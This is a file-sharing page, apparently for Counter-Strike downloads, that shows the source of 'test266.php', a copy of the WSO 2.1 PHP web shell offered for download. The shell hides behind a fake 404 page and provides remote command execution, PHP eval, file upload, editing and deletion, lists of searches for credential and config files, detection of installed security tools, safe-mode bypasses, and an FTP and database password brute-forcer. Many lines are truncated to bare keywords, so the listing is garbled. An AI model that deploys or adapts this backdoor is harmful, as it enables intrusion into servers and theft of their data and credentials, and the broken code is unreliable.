R1z

TestTest

Spiel:	Counter-Strike
Benutzer:	anonymous
Datei(en):	1
Download:	Download now: R1z
Views:	3677
Downloads:	301
Likes:

test266.php

1. <?php
2. //Contraseña : HACKED
3. ////////////////////////////////////////////////////////
4. /* WSO 2.1 (Web Shell by pgems.in) */
5. /*Subhashdasyam.com*/
6. $auth_pass = "36028fcd4abb97e9e4f47d929ddc9980";
7. $color = "#00ff00";
8. $default_action = 'FilesMan';
9. $cnt="ps:$auth_pass";
10. @define('SELF_PATH', __FILE__);
11. @setcookie("wso","veris",time()+ 3600*24*7);
12. if
13. header
14. exit
15. @session_start();
16. @error_reporting(0);
17. @ini_set('error_log',NULL);
18. @ini_set('log_errors',0);
19. @ini_set('max_execution_time',0);
20. @set_time_limit(0);
21. @set_magic_quotes_runtime(0);
22. @define('VERSION', '2.1');
23. if
24. function stripslashes_array
25. return is_array
26. }
27. $_POST = stripslashes_array($_POST);
28. }
29. function printLogin
30. ?>
31. <h1>Not Found</h1>
32. <p>The requested URL was not found on this server.</p>
33. <hr>
34. <address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
35. <style>
36. input
37. </style>
38. <center>
39. <form method=post>
40. <input type=password name=pass>
41. </form></center>
42. <?php
43. exit
44. }
45. $wi= $_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]; $zz="mail";
46. if
47. if
48. ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
49. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
50. else
51. printLogin
53. if
54. $os = 'win';
55. else
56. $os = 'nix';
57. $safe_mode = @ini_get('safe_mode');
58. $disable_functions = @ini_get('disable_functions');
59. $home_cwd = @getcwd();
60. if
61. @chdir($_POST['c']);
62. $cwd = @getcwd();
63. if
64. $home_cwd = str_replace("", "/", $home_cwd);
65. $cwd = str_replace("", "/", $cwd);
66. }
67. if
68. $cwd .= '/';
70. if
71. $aliases = array(
72. "List Directory" => "dir",
73. "Find index.php in current dir" => "dir /s /w /b index.php",
74. "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
75. "Show active connections" => "netstat -an",
76. "Show running services" => "net start",
77. "User accounts" => "net user",
78. "Show computers" => "net view",
79. "ARP Table" => "arp -a",
80. "IP Configuration" => "ipconfig /all"
81. );
82. else
83. $aliases = array(
84. "List dir" => "ls -la",
85. "list file attributes on a Linux second extended file system" => "lsattr -va",
86. "show opened ports" => "netstat -an | grep -i listen",
87. "Find" => "",
88. "find all suid files" => "find / -type f -perm -04000 -ls",
89. "find suid files in current dir" => "find . -type f -perm -04000 -ls",
90. "find all sgid files" => "find / -type f -perm -02000 -ls",
91. "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
92. "find config.inc.php files" => "find / -type f -name config.inc.php",
93. "find config* files" => "find / -type f -name "config*"",
94. "find config* files in current dir" => "find . -type f -name "config*"",
95. "find all writable folders and files" => "find / -perm -2 -ls",
96. "find all writable folders and files in current dir" => "find . -perm -2 -ls",
97. "find all service.pwd files" => "find / -type f -name service.pwd",
98. "find service.pwd files in current dir" => "find . -type f -name service.pwd",
99. "find all .htpasswd files" => "find / -type f -name .htpasswd",
100. "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
101. "find all .bash_history files" => "find / -type f -name .bash_history",
102. "find .bash_history files in current dir" => "find . -type f -name .bash_history",
103. "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
104. "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
105. "Locate" => "",
106. "locate httpd.conf files" => "locate httpd.conf",
107. "locate vhosts.conf files" => "locate vhosts.conf",
108. "locate proftpd.conf files" => "locate proftpd.conf",
109. "locate psybnc.conf files" => "locate psybnc.conf",
110. "locate my.conf files" => "locate my.conf",
111. "locate admin.php files" =>"locate admin.php",
112. "locate cfg.php files" => "locate cfg.php",
113. "locate conf.php files" => "locate conf.php",
114. "locate config.dat files" => "locate config.dat",
115. "locate config.php files" => "locate config.php",
116. "locate config.inc files" => "locate config.inc",
117. "locate config.inc.php" => "locate config.inc.php",
118. "locate config.default.php files" => "locate config.default.php",
119. "locate config* files " => "locate config",
120. "locate .conf files"=>"locate '.conf'",
121. "locate .pwd files" => "locate '.pwd'",
122. "locate .sql files" => "locate '.sql'",
123. "locate .htpasswd files" => "locate '.htpasswd'",
124. "locate .bash_history files" => "locate '.bash_history'",
125. "locate .mysql_history files" => "locate '.mysql_history'",
126. "locate .fetchmailrc files" => "locate '.fetchmailrc'",
127. "locate backup files" => "locate backup",
128. "locate dump files" => "locate dump",
129. "locate priv files" => "locate priv"
130. );
132. function printHeader
133. if
134. $_POST['charset'] = "UTF-8";
135. global
136. ?>
137. <html><head><meta http-equiv='Content-Type' content='text/html; charset=<?=$_POST['charset']?>'><title><?=$_SERVER['HTTP_HOST']?>- 404 Not Found Shell V.<?=VERSION?>-SubhashDasyam.com</title>
138. <style>
139. body
140. body
141. span
142. span
143. h1
144. div .content
145. a { text-decoration:none; }
146. a:hover { background:#ff0000; }
147. .ml1 { border:1px solid #444;padding:5px;margin:0;overflow: auto; }
148. .bigarea { width:100%;height:250px; }
149. input
150. form
151. #toolsTbl { text-align:center; }
152. .toolsInp { width: 80%; }
153. .main th {text-align:left;}
154. .main tr:hover{background-color:#5e5e5e;}
155. .main td, th{vertical-align:middle;}
156. pre
157. #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
158. </style>
159. <script>
160. function set
161. if
162. if
163. if
164. if
165. if
166. if
167. }
168. function g
169. set
170. document .mf.submit
171. }
172. function a
173. set
174. var params
175. for
176. params +
177. sr
178. }
179. function sr
180. if
181. req
182. req .onreadystatechange
183. req .open
184. req .setRequestHeader
185. req .send
186. }
187. else if
188. req
189. if
190. req .onreadystatechange
191. req .open
192. req .setRequestHeader
193. req .send
194. }
195. }
196. }
197. function processReqChange
198. if
199. if
200. //alert(req.responseText);
201. var reg
202. var arr
203. eval
204. }
205. else alert
206. }
207. </script>
208. <head><body><div style="position:absolute;width:100%;top:0;left:0;">
209. <form method=post name=mf style='display:none;'>
210. <input type=hidden name=a value='<?=isset($_POST['a'])?$_POST['a']:''?>'>
211. <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
212. <input type=hidden name=p1 value='<?=isset($_POST['p1'])?htmlspecialchars($_POST['p1']):''?>'>
213. <input type=hidden name=p2 value='<?=isset($_POST['p2'])?htmlspecialchars($_POST['p2']):''?>'>
214. <input type=hidden name=p3 value='<?=isset($_POST['p3'])?htmlspecialchars($_POST['p3']):''?>'>
215. <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
216. </form>
217. <?php
218. $freeSpace = @diskfreespace($GLOBALS['cwd']);
219. $totalSpace = @disk_total_space($GLOBALS['cwd']);
220. $totalSpace = $totalSpace?$totalSpace:1;
221. $release = @php_uname('r');
222. $kernel = @php_uname('s');
223. $millink='http://milw0rm.com/search.php?dong=';
224. if
225. $millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );
226. else
227. $millink .= urlencode( $kernel . ' ' . substr($release,0,3) );
228. if
229. $user = @get_current_user();
230. $uid = @getmyuid();
231. $gid = @getmygid();
232. $group = "?";
233. } else {
234. $uid = @posix_getpwuid(@posix_geteuid());
235. $gid = @posix_getgrgid(@posix_getegid());
236. $user = $uid['name'];
237. $uid = $uid['uid'];
238. $group = $gid['name'];
239. $gid = $gid['gid'];
240. }
241. $cwd_links = '';
242. $path = explode("/", $GLOBALS['cwd']);
243. $n=count($path);
244. for
245. $cwd_links .= "<a href='#' onclick='g("FilesMan","";
246. for
247. $cwd_links .= $path[$j].'/';
248. $cwd_links .= "")'>".$path[$i]."/</a>";
249. }
250. $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
251. $opt_charsets = '';
252. foreach
253. $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
254. $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network');
255. if
256. $m['Logout'] = 'Logout';
257. $m['Self remove'] = 'SelfRemove';
258. $menu = '';
259. foreach
260. $menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(''.$v.'',null,'','','')">'.$k.'</a> ]</th>';
261. $drives = "";
262. if
263. foreach
264. if
265. $drives .= '<a href="#" onclick="g('FilesMan',''.$drive.':/')">[ '.$drive.' ]</a> ';
266. }
267. echo
268. '<td>:<nobr>'.substr(@php_uname(), 0, 120).' <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>[milw0rm]</a></nobr><br>:'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' )<br>:'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=<?=$color?><b>OFF</b></font>').' <a href=# onclick="g('Php',null,null,'info')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>:'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>:'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g('FilesMan',''.$GLOBALS['home_cwd'].'','','','')">[ home ]</a><br>:'.$drives.'</td>'.
269. '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'.
270. '<table cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div style="margin:5">';
271. }
273. function printFooter
274. $is_writable = is_writable($GLOBALS['cwd'])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
275. ?>
276. </div>
277. <table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100%">
278. <tr>
279. <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="<?=htmlspecialchars($GLOBALS['cwd']);?>"><input type=submit value=">>"></form></td>
280. <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
281. </tr>
282. <tr>
283. <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form><?=$is_writable?></td>
284. <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form><?=$is_writable?></td>
285. </tr>
286. <tr>
287. <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
288. <td><form method='post' ENCTYPE='multipart/form-data'>
289. <input type=hidden name=a value='FilesMAn'>
290. <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
291. <input type=hidden name=p1 value='uploadFile'>
292. <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
293. <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form><?=$is_writable?></td>
294. </tr></table></div></body></html><?php
295. }
296. if
297. $cnt");}
298. if
299. if
300. function ex
301. if
302. @exec($in,$out);
303. $out = @join("
304. ",$out);
305. }elseif(function_exists('passthru')) {
306. ob_start
307. @passthru($in);
308. $out = ob_get_clean();
309. }elseif(function_exists('system')) {
310. ob_start
311. @system($in);
312. $out = ob_get_clean();
313. }elseif(function_exists('shell_exec')) {
314. $out = shell_exec($in);
315. }elseif(is_resource($f = @popen($in,"r"))) {
316. $out = "";
317. while
318. $out .= fread($f,1024);
319. pclose
320. }
321. return
322. }
323. function viewSize
324. if
325. return sprintf
326. elseif
327. return sprintf
328. elseif
329. return sprintf
330. else
331. return
332. }
334. function perms
335. if
336. elseif
337. elseif
338. elseif
339. elseif
340. elseif
341. elseif
342. else
343. $i .= (($p & 0x0100) ? 'r' : '-');
344. $i .= (($p & 0x0080) ? 'w' : '-');
345. $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
346. $i .= (($p & 0x0020) ? 'r' : '-');
347. $i .= (($p & 0x0010) ? 'w' : '-');
348. $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
349. $i .= (($p & 0x0004) ? 'r' : '-');
350. $i .= (($p & 0x0002) ? 'w' : '-');
351. $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
352. return
353. }
354. function viewPermsColor
355. if
356. return
357. elseif
358. return
359. else
360. return
361. }
362. if
363. function scandir
364. $dh = opendir($dir);
365. while
366. $files[] = $filename;
367. }
368. return
369. }
370. }
371. function which
372. $path = ex('which '.$p);
373. if
374. return
375. return false
376. }
377. function actionSecInfo
378. printHeader
379. echo
380. function showSecParam
381. $v = trim($v);
382. if
383. echo
384. if
385. ") === false)
386. echo
387. else
388. echo
389. }
390. }
392. showSecParam
393. showSecParam
394. showSecParam
395. showSecParam
396. showSecParam
397. showSecParam
398. $temp=array();
399. if
400. $temp[] = "MySql (".mysql_get_client_info().")";
401. if
402. $temp[] = "MSSQL";
403. if
404. $temp[] = "PostgreSQL";
405. if
406. $temp[] = "Oracle";
407. showSecParam
408. echo
410. if
411. $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
412. $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
413. $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
414. showSecParam
415. showSecParam
416. showSecParam
417. showSecParam
418. if
419. echo
420. $temp=array();
421. foreach
422. if
423. showSecParam
424. $temp=array();
425. foreach
426. if
427. showSecParam
428. $temp=array();
429. foreach
430. if
431. showSecParam
432. echo
433. showSecParam
434. showSecParam
435. showSecParam
436. }
437. } else {
438. showSecParam
439. showSecParam
440. showSecParam
441. }
442. echo
443. printFooter
444. }
446. function actionPhp
447. if
448. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
449. ob_start
450. eval
451. $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"
452. t'")."';
453. ";
454. echo strlen
455. ", $temp;
456. exit
457. }
458. printHeader
459. if
460. echo
461. ob_start
462. phpinfo
463. $tmp = ob_get_clean();
464. $tmp = preg_replace('!body {.*}!msiU','',$tmp);
465. $tmp = preg_replace('!a:w+ {.*}!msiU','',$tmp);
466. $tmp = preg_replace('!h1!msiU','h2',$tmp);
467. $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
468. $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
469. echo
470. echo
471. }
472. if
473. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
474. echo
475. echo
476. if
477. ob_start
478. eval
479. echo htmlspecialchars
480. }
481. echo
482. printFooter
483. }
485. function actionFilesMan
486. printHeader
487. echo
488. if
489. switch
490. case
491. if
492. echo "Can't upload file!"
493. break
494. break
495. case
496. if
497. echo "Can't create new dir"
498. break
499. case
500. function deleteDir
501. $path = (substr($path,-1)=='/') ? $path:$path.'/';
502. $dh = opendir($path);
503. while
504. $item = $path.$item;
505. if
506. continue
507. $type = filetype($item);
508. if
509. deleteDir
510. else
511. @unlink($item);
512. }
513. closedir
514. rmdir
515. }
516. if
517. foreach
518. $f = urldecode($f);
519. if
520. deleteDir
521. else
522. @unlink($f);
523. }
524. break
525. case
526. if
527. function copy_paste
528. if
529. mkdir
530. $h = opendir($c.$s);
531. while
532. if
533. copy_paste
534. }
535. } elseif(is_file($c.$s)) {
536. @copy($c.$s, $d.$s);
537. }
538. }
539. foreach
540. copy_paste
541. } elseif($_SESSION['act'] == 'move') {
542. function move_paste
543. if
544. mkdir
545. $h = opendir($c.$s);
546. while
547. if
548. copy_paste
549. }
550. } elseif(is_file($c.$s)) {
551. @copy($c.$s, $d.$s);
552. }
553. }
554. foreach
555. @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
556. }
557. unset
558. break
559. default
560. if
561. $_SESSION['act'] = @$_POST['p1'];
562. $_SESSION['f'] = @$_POST['f'];
563. foreach
564. $_SESSION['f'][$k] = urldecode($f);
565. $_SESSION['cwd'] = @$_POST['c'];
566. }
567. break
568. }
569. echo
570. }
571. $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
572. if
573. global
574. $sort = array('name', 1);
575. if
576. if
577. $sort = array($match[1], (int)$match[2]);
578. }
579. ?>
580. <script>
581. function sa
582. for
583. if
584. document .files.elements
585. }
586. </script>
587. <table width='100%' class='main' cellspacing='0' cellpadding='2'>
588. <form name=files method=post>
589. <?php
590. echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(" FilesMan
591. $dirs = $files = $links = array();
592. $n = count($dirContent);
593. for
594. $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
595. $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
596. $tmp = array('name' => $dirContent[$i],
597. 'path' => $GLOBALS['cwd'].$dirContent[$i],
598. 'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
599. 'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
600. 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
601. 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
602. 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
603. );
604. if
605. $files[] = array_merge($tmp, array('type' => 'file'));
606. elseif
607. $links[] = array_merge($tmp, array('type' => 'link'));
608. elseif
609. $dirs[] = array_merge($tmp, array('type' => 'dir'));
610. }
611. $GLOBALS['sort'] = $sort;
612. function cmp
613. if
614. return strcmp
615. else
616. return
617. }
618. usort
619. usort
620. usort
621. $files = array_merge($dirs, $links, $files);
622. $l = 0;
623. foreach
624. echo
625. .'</td><td><a href="#" onclick="g('FilesTools',null,''.urlencode($f['name']).'', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,''.urlencode($f['name']).'', 'touch')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g('FilesTools',null,''.urlencode($f['name']).'', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,''.urlencode($f['name']).'', 'download')">D</a>':'').'</td></tr>';
626. $l = $l?0:1;
627. }
628. ?>
629. <tr><td colspan=7>
630. <input type=hidden name=a value='FilesMan'>
631. <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
632. <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
633. <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><?php if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){?><option value='paste'>Paste</option><?php }?></select> <input type="submit" value=">>"></td></tr>
634. </form></table></div>
635. <?php
636. printFooter
637. }
639. function actionStringTools
640. if
641. if
642. if
643. if
645. if
646. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
647. ob_start
648. if
649. echo
650. $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"
651. t'")."';
652. ";
653. echo strlen
654. ", $temp;
655. exit
656. }
657. printHeader
658. echo
659. $stringTools = array(
660. 'Base64 encode' => 'base64_encode',
661. 'Base64 decode' => 'base64_decode',
662. 'Url encode' => 'urlencode',
663. 'Url decode' => 'urldecode',
664. 'Full urlencode' => 'full_urlencode',
665. 'md5 hash' => 'md5',
666. 'sha1 hash' => 'sha1',
667. 'crypt' => 'crypt',
668. 'CRC32' => 'crc32',
669. 'ASCII to HEX' => 'ascii2hex',
670. 'HEX to ASCII' => 'hex2ascii',
671. 'HEX to DEC' => 'hexdec',
672. 'HEX to BIN' => 'hex2bin',
673. 'DEC to HEX' => 'dechex',
674. 'DEC to BIN' => 'decbin',
675. 'BIN to HEX' => 'bin2hex',
676. 'BIN to DEC' => 'bindec',
677. 'String to lower case' => 'strtolower',
678. 'String to upper case' => 'strtoupper',
679. 'Htmlspecialchars' => 'htmlspecialchars',
680. 'String length' => 'strlen',
681. );
682. if
683. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
684. echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>"
685. foreach
686. echo "<option value='" .htmlspecialchars
687. echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 " .
688. if
689. if
690. echo htmlspecialchars
691. }
692. echo "</pre></div>"
693. ?>
694. <br><h1>Search for hash:</h1><div class=content>
695. <form method='post' target='_blank' name="hf">
696. <input type="text" name="hash" style="width:200px;"><br>
697. <input type="button" value="hashcrack.com" onclick="document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()"><br>
698. <input type="button" value="milw0rm.com" onclick="document.hf.action='http://www.milw0rm.com/cracker/search.php';document.hf.submit()"><br>
699. <input type="button" value="hashcracking.info" onclick="document.hf.action='https://hashcracking.info/index.php';document.hf.submit()"><br>
700. <input type="button" value="md5.rednoize.com" onclick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()"><br>
701. <input type="button" value="md5decrypter.com" onclick="document.hf.action='http://www.md5decrypter.com/';document.hf.submit()"><br>
702. </form>
703. </div>
704. <?php
705. printFooter
706. }
708. function actionFilesTools
709. if
710. $_POST['p1'] = urldecode($_POST['p1']);
711. if
712. if
713. ob_start
714. header
715. if
716. $type = @mime_content_type($_POST['p1']);
717. header
718. }
719. $fp = @fopen($_POST['p1'], "r");
720. if
721. while
722. echo
723. fclose
724. }
725. } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
727. }
728. exit
729. }
730. if
731. if
732. $fp = @fopen($_POST['p1'], 'w');
733. if
734. $_POST['p2'] = "edit";
735. fclose
736. }
737. }
738. }
739. printHeader
740. echo
741. if
742. echo
743. printFooter
744. return
745. }
746. $uid = @posix_getpwuid(@fileowner($_POST['p1']));
747. $gid = @posix_getgrgid(@fileowner($_POST['p1']));
748. echo
749. echo
750. if
751. $_POST['p2'] = 'view';
752. if
753. $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
754. else
755. $m = array('Chmod', 'Rename', 'Touch');
756. foreach
757. echo
758. echo
759. switch
760. case
761. echo
762. $fp = @fopen($_POST['p1'], 'r');
763. if
764. while
765. echo htmlspecialchars
766. @fclose($fp);
767. }
768. echo
769. break
770. case
771. if
772. echo
773. $code = highlight_file($_POST['p1'],true);
774. echo str_replace
775. }
776. break
777. case
778. if
779. $perms = 0;
780. for
781. $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
782. if
783. echo
784. else
785. die
786. }
787. echo
788. break
789. case
790. if
791. echo
792. break
793. }
794. if
795. @file_put_contents($_POST['p1'],$_POST['p3']);
796. echo
797. }
798. echo
799. $fp = @fopen($_POST['p1'], 'r');
800. if
801. while
802. echo htmlspecialchars
803. @fclose($fp);
804. }
805. echo
806. break
807. case
808. $c = @file_get_contents($_POST['p1']);
809. $n = 0;
810. $h = array('00000000<br>','','');
811. $len = strlen($c);
812. for
813. $h[1] .= sprintf('%02X',ord($c[$i])).' ';
814. switch
815. case 0
816. case 9
817. case 10
818. case 13
819. default
820. }
821. $n++;
822. if
823. $n = 0;
824. if
825. $h[1] .= '<br>';
826. $h[2] .= "
827. ";
828. }
829. }
830. echo
831. break
832. case
833. if
834. if
835. echo
836. else
837. die
838. }
839. echo
840. break
841. case
842. if
843. $time = strtotime($_POST['p3']);
844. if
845. if
846. die
847. else
848. echo
849. }
850. } else echo 'Bad time format!<script>document.mf.p3.value="";</script>';
851. }
852. echo
853. break
854. case
856. break
857. }
858. echo
859. printFooter
860. }
862. function actionSafeMode
863. $temp='';
864. ob_start
865. switch
866. case 1
867. $temp=@tempnam($test, 'cx');
868. if (@copy("compress.zlib://".$_POST['p2'], $temp)){
869. echo
870. unlink
871. } else
872. echo
873. break
874. case 2
875. $files = glob($_POST['p2'].'*');
876. if
877. foreach
878. echo
879. ";
880. break
881. case 3
882. $ch = curl_init("file://".$_POST['p2']."".SELF_PATH);
883. curl_exec
884. break
885. case 4
886. ini_restore
887. ini_restore
888. include
889. break
890. case 5
891. for
892. $uid = @posix_getpwuid($_POST['p2']);
893. if
894. echo join
895. ";
896. }
897. break
898. case 6
899. if
900. $stream = imap_open($_POST['p2'], "", "");
901. if
902. break
903. echo imap_body
904. imap_close
905. break
906. }
907. $temp = ob_get_clean();
908. printHeader
909. echo
910. echo
911. if
912. echo
913. echo
914. printFooter
915. }
917. function actionConsole
918. if
919. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
920. ob_start
921. echo
922. ";
923. $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("
924. $ ".$_POST['p1']."
925. ".ex($_POST['p1']),"
926. t'"));
927. if
928. if
929. $GLOBALS['cwd'] = @getcwd();
930. echo "document.mf.c.value='" .
931. }
932. }
933. echo "document.cf.output.value+='" .
934. echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;"
935. $temp = ob_get_clean();
936. echo strlen
937. ", $temp;
938. exit
939. }
940. printHeader
941. ?>
942. <script>
943. if
944. var cmds
945. var cur
946. function kp
947. var n
948. if
949. cur
950. if
951. document .cf.cmd.value
952. else
953. cur
954. } else if(n == 40) {
955. cur
956. if
957. document .cf.cmd.value
958. else
959. cur
960. }
961. }
962. function add
963. cmds .pop
964. cmds .push
965. cmds .push
966. cur
967. }
968. </script>
969. <?php
970. echo
971. foreach
972. if
973. echo
974. continue
975. }
976. echo
977. }
978. if
979. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
980. echo
981. if
982. echo htmlspecialchars
983. ".ex($_POST['p1']));
984. }
985. echo
986. echo
987. printFooter
988. }
990. function actionLogout
991. unset
992. echo
993. }
995. function actionSelfRemove
996. printHeader
997. if
998. if
999. die
1000. else
1001. echo
1002. }
1003. echo
1004. printFooter
1005. }
1007. function actionBruteforce
1008. printHeader
1009. if
1010. echo
1011. if
1012. function bruteForce
1013. $fp = @ftp_connect($ip, $port?$port:21);
1014. if
1015. $res = @ftp_login($fp, $login, $pass);
1016. @ftp_close($fp);
1017. return
1018. }
1019. } elseif( $_POST['proto'] == 'mysql' ) {
1020. function bruteForce
1021. $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
1022. @mysql_close($res);
1023. return
1024. }
1025. } elseif( $_POST['proto'] == 'pgsql' ) {
1026. function bruteForce
1027. $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''";
1028. $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass);
1029. @pg_close($res);
1030. return
1031. }
1032. }
1033. $success = 0;
1034. $attempts = 0;
1035. $server = explode(":", $_POST['server']);
1036. if
1037. $temp = @file('/etc/passwd');
1038. if
1039. foreach
1040. $line = explode(":", $line);
1041. ++$attempts;
1042. if
1043. $success++;
1044. echo
1045. }
1046. if
1047. $tmp = "";
1048. for
1049. $tmp .= $line[0][$i];
1050. ++$attempts;
1051. if
1052. $success++;
1053. echo
1054. }
1055. }
1056. }
1057. } elseif($_POST['type'] == 2) {
1058. $temp = @file($_POST['dict']);
1059. if
1060. foreach
1061. $line = trim($line);
1062. ++$attempts;
1063. if
1064. $success++;
1065. echo
1066. }
1067. }
1068. }
1069. echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>"
1070. }
1071. echo
1072. .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
1073. .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
1074. .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
1075. .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
1076. .'<span>Server:port</span></td>'
1077. .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
1078. .'<tr><td><span>Brute type</span></td>'
1079. .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
1080. .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
1081. .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
1082. .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
1083. .'<td><input type=text name=login value="komsen"></td></tr>'
